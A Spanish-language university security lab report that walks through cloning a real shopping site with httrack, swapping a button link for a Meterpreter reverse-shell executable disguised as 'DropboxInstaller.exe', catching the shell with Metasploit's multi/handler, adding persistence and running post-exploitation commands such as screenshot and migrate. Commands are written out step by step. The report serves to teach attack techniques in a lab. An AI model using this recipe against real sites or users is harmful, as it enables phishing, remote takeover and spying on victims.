Está en la página 1de 17

LABORATORIO MALWARE EXPLOIT ON WINDOWS SERVER

PRESENTADO POR:
SANDRA MARCELA DIAZ DORIA

DOCENTE
ALBERTO PATERNINA

16 DE JUNIO

CORPORACIÓN UNIVERSITARIA RÉMINGTON


DIPLOMADO SEGURIDAD INFORMATICA
2022
Conceptos

Payload de tipo reverse: El reverse es un tipo de Shell en el que el equipo


objetivo se comunica de vuelta con la máquina atacante. La máquina atacante
tiene un puerto de escucha en el que se recibe la conexión de la víctima, ya sea
por la ejecución por si mima del exploit o a través de una vulnerabilidad que posea
al tener una aplicación desactualizada.

MSFvenom: es una combinación de Msfpayload y Msfencode, que coloca ambas


herramientas en una sola instancia de Framework. msfvenom reemplazó tanto a
msfpayload como a msfencode a partir del 8 de junio de 2015.

msfconsole : es probablemente la interfaz más popular para Metasploit


Framework (MSF). Proporciona una consola centralizada “todo en uno” y le
permite un acceso eficiente a prácticamente todas las opciones disponibles en
MSF. MSFconsole puede parecer intimidante al principio, pero una vez que
aprenda la sintaxis de los comandos, aprenderá a apreciar el poder de utilizar esta
interfaz.

wine : es una reimplementación de la interfaz de programación de aplicaciones


de Win16 y Win32 para sistemas operativos basados en Unix. Permite la ejecución
de programas diseñados para MS-DOS, y las versiones de Microsoft Windows
3.11, 95, 98, Me, NT, 2000, XP, Vista, 7, 8 y 10.

Resource Hacker: es una aplicación freeware de extracción de recursos


desarrollada por Angus Johnson para Windows. Se usa para modificar elementos
de programas o del sistema operativo, como iconos, extrayendo recursos de
programas ejecutables, bibliotecas de enlace dinámico, y ficheros. Enlace de
descarga: http://www.angusj.com/resourcehacker/

PSTools Suite: es un conjunto de herramientas que se pueden usar para la


administración remota de un PC, desde la consola de comandos de Windows.
Lo primero que vamos a hacer es utilizar un comando que nos permite activar la
arquitectura de 32 bits para poder instalar WINE, ya que WINE solamente emula
aplicaciones en 32 bits

Sudo dpkg —add-architecture i386

Actualizamos el gestor de paquetes

Sudo apt-get update


Una vez se actualiza los paquetes procedemos a instalar wine 32

Sudo apt-get install wine32

Ejecutamos y se procede con la instalación de wine

Habilitamos el servicio de postgresql y de apache2 dependiendo, de la aplicación


que se vaya a descargar o re direccionar a nuestro servidor, o solamente para
mostrar la página

Inicializamos los servicios y comprobamos el estado con los siguientes dos


comandos

Sudo systemctl start apache2. Service

Sudo systemctl status apache2. Service


De igual forma inicializamos los servicios en postgresql y verificamos que estén
activos

Sudo systemctl start postgresql. Service

Sudo systemctl status postgresql. Service

Ahora utilizamos httrack cual posibilita clonar la aplicación

Sudo apt-get install httrack


Ahora vamos a preparar el entorno donde se va a mostrar la página que se quiere
clonar, para esto utilizamos la instrucción de súper usuario seguido del comando
httrack, después colocamos la dirección de la página y por último la ruta en la cual
la vamos a copiar.

Utilizamos el comando ifconfig para conocer la dirección ip. Vemos que la


dirección que tenemos es la 192.168.1.7
Ahora colocamos la dirección en el navegador. Podemos ver cómo nos aparece la
página de mega que fue la ruta que utilizamos, lo que indica que lo hemos clonado
con éxito.

Hacemos el ejercicio con otra página web

https://alessoshop.com/ventas/en
Una vez hacemos el clonado de la página procedemos a buscar el archivo para
realizar la configuración del enlace del botón, en este caso yo escogí la opción de
instagram que me re direcciona a otra página. Para esto arrastraremos el archivo
desde kali a nuestro escritorio y lo abriremos con el IDE visual studio Code, una
vez abierto buscamos la ruta y cambiamos el nombre (DropboxInstaller.exe) y
guardamos el archivo.
Para seguir simplemente tomamos el archivo de nuestro escritorio al escritorio de
kali y de ahí utilizando el comando cp, lo copiamos a nuestra carpeta var

Sudo cp /home/kali/Desktop/en.html /var/www/html/alessoshop.com/ventas

Ahora lo que hacemos es movernos del directorio donde estamos con el comando
cd y posterior ejecutamos el comando

Sudo msfvenom –p Windows/meterpreter/reverse_tcp LHOST=192.168.1.7


LPORT=4444 –platform Windows –f exe > DropboxInstaller.exe
Inicializamos los servicios

Ahora procedemos a entrar a Windows server y desde ahí escribimos la dirección


y nos cargara enseguida la página, desde aquí descargaremos el archivo
Al descargar ejecutamos

Nos vamos a kali y abrimos una nueva terminal donde ejecutamos el comando
sudo msfconsole
Comandos

Use multi/handler

Set PAYLOAD Windows/meterpreter/reverese_tcp

Set lhost 192.168.1.7

Options

Run

help
Creamos la persistencia con el comando:

run persistence –x –u –i 30 -p 4444 –r 192.168.1.7

Ejecutamos algunos comandos

System commands/ ps: lista los procesos en ejecución

System commands/getpid: obtiene el identificador del proceso actual

Commands/ migrate: Nos permite migrar el servidor a otro proceso, en este


comando solo colocamos el comando migrate más el pid del proceso hacia dónde
vamos a migrar
User interfaces commands/ screenshot: Toma una captura de pantalla del
escritorio interactivo

Aquí nos dice que guardo el screen en la ruta /home/kali/LKOIGctR.jpeg

Networking commands/ netstat: muestra las conexiones de red


Fyle systems comands/dir: Nos permite listar archivos

System commands/ sysinfo: Obtiene información sobre el sistema remoto

System commands/ getuid: se obtiene el usuario con el que se ejecuta el


servidor

Networking commands/ arp: Muestra la memoria cache ARP del host


Commands /Machine_id: con este comando podremos ver la identificación de la
maquina vulnerada

User interfaces commands/enumdesktops: enumera todos los escritorios y


estaciones de ventana accesibles

System commands/localtime: Muestra la fecha y la hora local del sistema de


destino

User interfaces commands/ idletime: Devuelve la cantidad de segundos que el


usuario remoto ha estado inactivo

Fyle systems comands/Pwd: Imprime el directorio de trabajo, aquí nos muestra


la ruta donde se encuentra

También podría gustarte